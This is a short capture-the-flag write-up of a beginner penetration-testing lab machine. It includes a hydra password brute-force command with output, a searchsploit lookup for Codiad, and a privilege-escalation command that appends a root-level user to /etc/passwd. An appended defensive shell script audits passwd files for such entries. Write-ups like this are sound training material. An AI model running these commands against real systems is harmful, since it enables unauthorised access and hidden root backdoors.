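Difficulty: medium
Description: Real-life machine + CTF. The machine is designed to be real-life (maybe not?) and is well suited to newcomers who are just starting out in penetration testing.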
Basic information

        Local machine    Target machine
IP      10.17.5.121      10.10.232.226
OS      kali             linux
Information gathering
Port scan
Login credentials are required
┌──(leo㉿HACK)-[~/SecLab/inferno]
└─$ hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.232.226 http-get /inferno
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-12-01 15:01:44
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking http-get://10.10.232.226:80/inferno
[STATUS] 1341.00 tries/min, 1341 tries in 00:01h, 14343057 to do in 178:16h, 16 active
[STATUS] 1410.00 tries/min, 4230 tries in 00:03h, 14340168 to do in 169:31h, 16 active
Attack vector
searchsploit codiad
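Exploitation
You will notice that a cronjob logs you out every minute, so you have to be quick.
Obtained the key
Try logging in over SSH
Let's use this to create a privileged user:
Privilege escalation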
openssl passwd -1 -salt "test" "test"
echo 'test:$1$test$pi/xDtU5WFVRqYS6BMU8X/:0:0:root:/root:/bin/bash' | sudo tee -a /etc/passwd
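The line appended above gives a second account UID 0 and stores its password hash directly in /etc/passwd. As an added example (not part of the original write-up), this POSIX shell function audits a passwd-format file for those anomalies; the function names and the sample file are constructed for illustration, apart from the test entry, which is copied from the command above.

```sh
#!/bin/sh
# Added example: audit a passwd-format file for entries like the one appended above.

# audit_passwd [FILE] prints one finding per line as "<reason>:<username>".
# FILE defaults to /etc/passwd.
audit_passwd() {
    awk -F: '
        NF < 7 { next }    # skip blank or malformed lines
        # UID 0 should belong to root only; any other name is a second superuser
        $3 == 0 && $1 != "root" { print "uid0:" $1 }
        # With shadow passwords field 2 is x, * or !; a crypt string here is a
        # usable password that bypasses /etc/shadow
        $2 ~ /^\$/ { print "inline_hash:" $1 }
        # An empty field 2 means the account has no password at all
        $2 == "" { print "empty_password:" $1 }
    ' "${1:-/etc/passwd}"
}

# Constructed sample file; only the last entry comes from the write-up.
sample_passwd() {
    cat <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
user1:x:1000:1000::/home/user1:/bin/bash
test:$1$test$pi/xDtU5WFVRqYS6BMU8X/:0:0:root:/root:/bin/bash
EOF
}

# Demo run against the constructed sample
sample_file=$(mktemp)
sample_passwd > "$sample_file"
audit_passwd "$sample_file"
rm -f "$sample_file"
```

Run it without an argument on a host to check the live /etc/passwd; any output line is worth investigating, together with the sudo rule that allowed writing to the file.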